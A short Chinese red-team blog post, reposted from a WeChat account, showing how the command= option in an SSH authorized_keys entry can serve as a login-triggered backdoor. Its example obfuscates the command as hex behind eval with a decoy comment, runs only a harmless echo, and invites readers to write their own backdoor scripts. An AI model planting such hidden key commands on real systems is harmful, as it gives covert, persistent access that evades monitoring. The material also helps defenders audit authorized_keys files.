linux另一种后门思路

admin 2023年5月31日01:35:47评论54 views字数 743阅读2分28秒阅读模式

我们使用aws服务器,会提示客户不要以 root 身份登录,这个提示从哪来的,通过查询资料,可以发现公钥(id_rsa.pub或者authorized_keys)里面有这段代码

no-port-forwarding,no-agent-forwarding,command="echo 'Please login as the user "ubuntu" rather than the user "root".';echo;sleep 10;exit 142" ssh-ed25519 AAAA...

让我们看下一下后门字符串:这no-user-rc,no-X11-forwarding是一个躲避任何设备监控。可以省略。

字符串command=是真正的执行命令的地方,我们来生成个后门:

command="`###---POWERSHELL---`;eval $(echo 6563686f2048656c6c6f204261636b646f6f72|xxd -r -ps)"

"OpenSSH 执行两个引号...之间的整个字符串"。

这`###---POWERSHELL---`;是个占位符。它什么都不做。

下一个命令eval执行隐藏在编码的十六进制字符串中的命令。

让我们解码十六进制字符串以显示正在执行的实际命令:

$ echo 6563686f2048656c6c6f204261636b646f6f72 | xxd -r -psecho Hello Backdoor

当我们登录ssh,就会执行这条命令,后面大家可以自己编写后门脚本。


参考

https://man.openbsd.org/OpenBSD-current/man8/sshd.8#AUTHORIZED_KEYS_FILE_FORMAT


原文始发于微信公众号(红队笔记录):linux另一种后门思路

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月31日01:35:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   linux另一种后门思路https://cn-sec.com/archives/1760840.html

发表评论

匿名网友 填写信息